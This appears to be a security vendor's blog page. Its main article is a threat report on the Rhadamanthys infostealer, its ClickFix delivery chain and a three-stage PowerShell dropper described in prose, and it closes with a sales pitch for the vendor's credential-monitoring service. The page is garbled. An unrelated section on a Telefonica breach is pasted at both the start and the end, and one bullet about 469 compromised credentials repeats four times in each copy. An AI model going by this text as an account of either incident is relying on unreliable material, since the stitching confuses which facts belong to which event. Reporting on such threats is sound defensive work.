Spanish telecommunications giant Telefonica recently fell victim to a significant cybersecurity breach, showing that even large organizations can be vulnerable. The event highlights how important it is to maintain strong defenses, especially against infostealers, which are designed specifically to steal information.

The Breach: What Happened?

This month (January 2025), Telefonica confirmed unauthorized access to its internal Jira ticketing system. The breach, orchestrated by a group of attackers allegedly linked to the Hellcat ransomware group, resulted in the theft of approximately 2.3 GB of sensitive data. The stolen information included:

• 24,000 employee emails and names
• 500,000 Jira issues and summaries
• 5,000 internal documents
• 236,493 lines of customer data

The Attack Vector: Infostealer Malware

The breach was facilitated by infostealer malware, a type of malicious software designed to harvest sensitive information such as login credentials from infected devices. Numerous employees were reported to be compromised, providing attackers with critical credentials for initial access

• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.

A few months ago, we explored the rapid rise of Rhadamanthys, a sophisticated information-stealing malware making waves across the underground. Since then, the threat has continued to evolve, adopting new delivery techniques and expanding its capabilities. 

One of the most notable recent developments is the use of the “ClickFix” delivery chain, a social engineering tactic that tricks victims into running malicious code themselves under the guise of fixing a technical issue.

In this follow-up, we’ll break down how Rhadamanthys operators are weaponizing ClickFix, walk through the technical stages of its latest campaigns, and highlight other key updates that defenders need to know.

The “ClickFix” Tactic: Phishing Gets an Upgrade

ClickFix (also called ClearFix) is a clever phishing scheme where attackers present a bogus error or verification step and instruct the user to copy-paste a provided command (often PowerShell) to resolve it.

By doing so, the unwitting user executes the malware payload, bypassing many automated defenses. This method emerged in late 2024 and has only gained momentum in 2025.

Security teams have observed that threat actors previously using ClickFix for other malware (notably the Lumma stealer) have now pivoted to using it for Rhadamanthys campaigns. 

Rhadamanthys is an attractive payload: it’s stealthy, feature-rich, and (thanks to being sold as Malware-as-a-Service) widely available to cybercriminals.

A recent phishing campaign is a good example of how Rhadamanthys piggybacks on the ClickFix technique. The attack email was crafted as a verification request from what looked like a trusted company. It instructed the recipient to run a command as part of a security check. 

The command provided was a one-liner that invoked mshta.exe with a URL and an access code. If a recipient followed the steps, they unknowingly launched an HTA (HTML application) that executed an obscured PowerShell script in the background.

From there, a three-stage malware dropper took over:

• Stage 1: A PowerShell snippet runs with window visibility turned off (-w 1), so the user sees no prompt. It then performs some junk operations (like sorting bytes in a fixed “random” way) – simple obfuscation to hide the real code’s intent. This ultimately decrypts and launches a second-stage payload.
• Stage 2: A larger PowerShell blob (Base64-encoded and then UTF-32 decoded) executes, retrieving an intermediate malware file (around 10 MB, itself protected with layers of obfuscation via Agile.NET). This stage connects out to download the final payload from a remote server.
• Stage 3: The final stage is the Rhadamanthys infostealer (v0.7.0), now loaded into memory and activated.

Source

Once Rhadamanthys is running on the victim’s machine, it’s game over for data security. This stealer is designed to vacuum up a wide range of sensitive information. It immediately harvests system details, stored passwords, browser cookies, saved logins, cryptocurrency wallet files, and more. 

Rhadamanthys even has modules to scrape text from images or screenshots, using OCR techniques to capture things like 2FA backup codes or cryptocurrency seed phrases that users might have saved as images. Almost nothing is off-limits. 

It targets mainstream software (Chrome, Outlook, Discord, VPN clients) as well as niche apps like the Pale Moon browser or Auvita cryptocurrency wallets. All stolen data is encrypted and exfiltrated to the attackers’ remote server within minutes, ready to be monetized.

It’s no accident that ClickFix campaigns have made Rhadamanthys their payload of choice. An attack that combines stealthy initial access (via user-triggered scripts) with a stealthy infostealer in the final stage is highly likely to slip past traditional defenses. 

Rhadamanthys is Poised to Dominate

Twilight Cyber data confirms that LummaC2 remains by far the most active infostealer, responsible for more than 2.8 million infections in 2025 alone. But Rhadamanthys has carved out a strong second place, with over 235,000 infections recorded in the same period.

Rhadamanthys is sold as a service (MaaS), meaning any criminal affiliate can purchase access to a build and run their own campaigns. This model has fueled its steady rise, empowering both organized cybercrime groups and low-skilled “script kiddies” to weaponize the malware. 

With continuous updates, an easy-to-use dashboard, and strong underground adoption, Rhadamanthys has become the runner-up to Lumma and the most credible challenger in the infostealer ecosystem.

Recent developments and trends around Rhadamanthys:

Aggressive Global Campaigns:
Throughout late 2024 and 2025, Rhadamanthys has appeared in numerous phishing campaigns. One large-scale operation dubbed “CopyRobin(hood)adamantys”leveraged fake copyright infringement notices to target victims across North America, Europe, East Asia, and South America. 

The attackers impersonated dozens of well-known companies (adapting logos and languages for each region) and tricked recipients into downloading password-protected archives carrying the stealer. 

Other campaigns masqueraded as hotel booking confirmations, financial documents, or business support emails. The common theme is social engineering at scale.

Affiliate Adoption and Dark Web Popularity:
Criminal forums have seen increased promotion of Rhadamanthys. The stealer is actively marketed on dark web marketplaces and Telegram channels as a reliable credential-gathering tool. 

Its affordability and strong support (regular updates, bug fixes, even tech support for buyers) lower the barrier to entry for cybercriminals. This means many new threat actors, from small-time fraudsters to initial access brokers, are choosing Rhadamanthys as their tool of choice. 

Continuous Evolution:
Rhadamanthys’s developers have proven keen to one-up the competition. The malware’s modular framework allows them to rapidly introduce new capabilities. New delivery methods are also quite common, as demonstrated with with the adoption of the ClickFix social engineering chain by affiliates.

If web browsers harden against certain attacks, the malware can update to find a workaround. If defenders get better at detecting one behavior, the authors can push a new version with altered tactics. This agility keeps Rhadamanthys one of the most effective and hard-to-detect infostealers in circulation.

Broader Range of Threat Actors:
While infostealers are typically associated with financially motivated cybercrime groups, Rhadamanthys has also surfaced in espionage and state-aligned operations. In one case, an Iranian APT group (tracked as Void Manticore) deployed Rhadamanthys as part of a targeted campaign in the Middle East, disguising it as a software update for F5 networking equipment.

Even nation-state actors recognize the value of grabbing credentials at scale, and opted to use an “off-the-shelf” stealer like Rhadamanthys rather than custom malware, likely because it’s effective and readily available. 

Evolving Delivery Vectors:
Email phishing remains the primary path for Rhadamanthys infections, but it’s not the only one. We’ve seen malvertising (malicious ads on search results) that trick users into downloading trojanized software installers laced with Rhadamanthys. 

We’ve also seen abuse of collaboration platforms. For example, hijacked or fake Discord server invites that lead users to malware in the guise of “verification bots,” often using the ClickFix technique to deploy payloads via hidden scripts.

The recent spike in “HTML smuggling” (where an HTML attachment carries encoded malware or scripts) pairs perfectly with Rhadamanthys, since HTML files can easily implement ClickFix-style tricks. Organizations therefore must be vigilant on multiple fronts, not just email gateways.

Staying Ahead of Infostealers With Twilight

200,000 new infostealer infections occur every day. Without real-time visibility into stolen credentials, your organization could already be compromised and not know it.

This is where Twilight Cyber can help. Our mission is to detect and stop threats like Rhadamanthys before they wreak havoc on your organization’s accounts.

Our Identity Threat Protection platform continuously monitors dark web markets, infostealer log dumps, and malware C2 feeds for any sign of your organization’s credentials being leaked. We leverage a proprietary database of compromised data (updated hourly) to instantly flag when an employee’s password or cookie shows up in a Rhadamanthys haul. 

If detected, we alert you in real-time and provide actionable intelligence, including which user, which machine, and what data was stolen, so you can respond immediately (e.g. forcing password resets, invalidating sessions) and prevent a potential breach.

Interested in seeing if your organization’s credentials have already appeared in stealer logs?

Try our FREE scan now:

For more information, get in touch with Twilight Cyber for a live demo of our Identity Threat Protection platform. 

Spanish telecommunications giant Telefonica recently fell victim to a significant cybersecurity breach, showing that even large organizations can be vulnerable. The event highlights how important it is to maintain strong defenses, especially against infostealers, which are designed specifically to steal information.

The Breach: What Happened?

This month (January 2025), Telefonica confirmed unauthorized access to its internal Jira ticketing system. The breach, orchestrated by a group of attackers allegedly linked to the Hellcat ransomware group, resulted in the theft of approximately 2.3 GB of sensitive data. The stolen information included:

• 24,000 employee emails and names
• 500,000 Jira issues and summaries
• 5,000 internal documents
• 236,493 lines of customer data

The Attack Vector: Infostealer Malware

The breach was facilitated by infostealer malware, a type of malicious software designed to harvest sensitive information such as login credentials from infected devices. Numerous employees were reported to be compromised, providing attackers with critical credentials for initial access

• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.

Leave your email and get critical updates and alerts from Twilight Cyber straight to your inbox